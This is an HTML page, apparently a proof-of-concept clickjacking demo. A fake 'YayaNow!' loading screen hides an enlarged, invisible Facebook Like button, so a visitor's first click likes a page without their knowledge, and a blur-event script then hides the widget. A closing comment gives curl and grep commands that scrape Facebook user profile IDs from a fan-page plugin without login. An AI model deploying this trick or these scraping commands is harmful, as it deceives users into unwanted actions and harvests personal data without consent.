
<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js">
<!--<![endif]-->

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>What every page knows about you</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Place favicon.ico and apple-touch-icon.png in the root directory -->
    <style>
    html,
    body {
        height: 100%;
        width: 100%;
        margin: 0;
        padding: 0;
        font-family: 'Avenir', 'helvetica neue', helvetica, arial, sans-serif;
        ;
        position: relative;
        color: white;
        -webkit-font-smoothing: antialiased;
        overflow: hidden;
    }
    
    html,
    #splash {
        background-color: #2196F3;
    }
    
    .fb_iframe_widget {
        bottom: 0px;
        position: absolute !important;
        transform-origin: left bottom;
        transform: scale(61);
    }
    
    .fb_iframe_widget > span {
        margin-bottom: -8px;
        margin-left: -2px;
    }
    
    #splash {
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        padding-top: 37%;
        text-align: center;
        /* let all taps through */
        pointer-events: none;
        /* above the popup of the G +1 button*/
        z-index: 2000000647;
        font-size: 16px;
        line-height: 20px;
        /*display: none;*/
    }
    
    #logo {
        display: block;
        width: 88px;
        height: 88px;
        margin: 0 auto;
        background: white;
        border-radius: 50%;
        padding: 16px;
        margin-top: -24px;
        -webkit-animation: spin 2000ms linear 2;
        -moz-animation: spin 2000ms linear 2;
        animation: spin 2000ms linear 2;
    }
    
    @-moz-keyframes spin {
        100% {
            -moz-transform: rotate(360deg);
        }
    }
    
    @-webkit-keyframes spin {
        100% {
            -webkit-transform: rotate(360deg);
        }
    }
    
    @keyframes spin {
        100% {
            -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
        }
    }
    
    #title {
        font-size: 28px;
        line-height: 56px;
    }
    
    #subtitle {
        margin-top: -4px;
    }
    
    #clickjack {
        width: 240px;
        margin: 64px auto;
        color: black;
        padding: 16px;
        background-color: white;
    }
    </style>
</head>

<body>
    <div id="splash">
        <svg xmlns="http://www.w3.org/2000/svg" fill="#2196F3" height="24" viewBox="0 0 24 24" width="24" id="logo">
            <path d="M0 0h24v24H0z" fill="none" />
            <path d="M18.7 12.4c-.28-.16-.57-.29-.86-.4.29-.11.58-.24.86-.4 1.92-1.11 2.99-3.12 3-5.19-1.79-1.03-4.07-1.11-6 0-.28.16-.54.35-.78.54.05-.31.08-.63.08-.95 0-2.22-1.21-4.15-3-5.19C10.21 1.85 9 3.78 9 6c0 .32.03.64.08.95-.24-.2-.5-.39-.78-.55-1.92-1.11-4.2-1.03-6 0 0 2.07 1.07 4.08 3 5.19.28.16.57.29.86.4-.29.11-.58.24-.86.4-1.92 1.11-2.99 3.12-3 5.19 1.79 1.03 4.07 1.11 6 0 .28-.16.54-.35.78-.54-.05.32-.08.64-.08.96 0 2.22 1.21 4.15 3 5.19 1.79-1.04 3-2.97 3-5.19 0-.32-.03-.64-.08-.95.24.2.5.38.78.54 1.92 1.11 4.2 1.03 6 0-.01-2.07-1.08-4.08-3-5.19zM12 16c-2.21 0-4-1.79-4-4s1.79-4 4-4 4 1.79 4 4-1.79 4-4 4z" />
        </svg>
        <div id="title">YayaNow!</div>
        <div id="subtitle">Loading...</div>
    </div>
    <div id="fb-root"></div>
    <script>
    (function(d, s, id) {
        var js, fjs = d.getElementsByTagName(s)[0];
        if (d.getElementById(id)) return;
        js = d.createElement(s);
        js.id = id;
        js.src = "//connect.facebook.net/de_DE/sdk.js#xfbml=1&version=v2.5&appId=485257761663274";
        fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));
    </script>
    <div class="fb-like" data-href="https://www.facebook.com/page" data-layout="standard" data-action="like" data-show-faces="false" data-share="false"></div>
    <div id="clickjack">
        <a href="https://www.facebook.com/page" target="_blank">Here you can see the FB-Page you just liked.</a>
    </div>
    <script>
    'use strict';
    setTimeout(function() {
        document.getElementById('subtitle').innerHTML = 'Click to continue...';
    }, 3000);
    'use strict';
    (function(document) {
        // focus window so we can detect the blur event 
        window.focus();
        // when user clicks on g+ button, our window gets blurred
        window.addEventListener('blur', function() {
            console.log('click jacked');
          
            setTimeout(function() {
                document.getElementById('splash').style.pointerEvents = 'all';
                document.getElementById('splash').style.display = 'none';
                document.querySelector('.fb_iframe_widget').style.transform = 'none';
                document.querySelector('.fb_iframe_widget').style.bottom = '-20000px';
                document.querySelector('.fb_iframe_widget').style.opacity = '0';
            }, 200);

        }, false);


    }(document));
    </script>
</body>
<!-- 

this must be done on the server-side:

FB.api(
    "1367257790029930_2484450878310610/likes",
    function (response) {
      console.log(response)
      if (response && !response.error) {
        /* handle the result */
         console.log(response)
      }
    }
); 

here you can access some user id's without login
https://www.facebook.com/plugins/fan.php?connections=100&id=1367257790029930
https://www.facebook.com/plugins/fan.php?connections=100&id=406272506205378

curl https://www.facebook.com/plugins/fan.php\?connections\=100\&id\=406272506205378  | grep -o -E 'href="([^"#]+)"' | cut -d'"' -f2 | sort | uniq

curl https://www.facebook.com/plugins/fan.php\?connections\=100\&id\=100008443869824  | grep -o -E 'href="([^"#]+)"' | cut -d'"' -f2 | sort | uniq


curl https://www.facebook.com/plugins/fan.php\?connections\=100\&id\=406272506205378  | grep -o -E 'https://www.facebook.com/profile.php?id=([^"#]+)"' | cut -d'"' -f2 | sort | uniq

-->

</html>
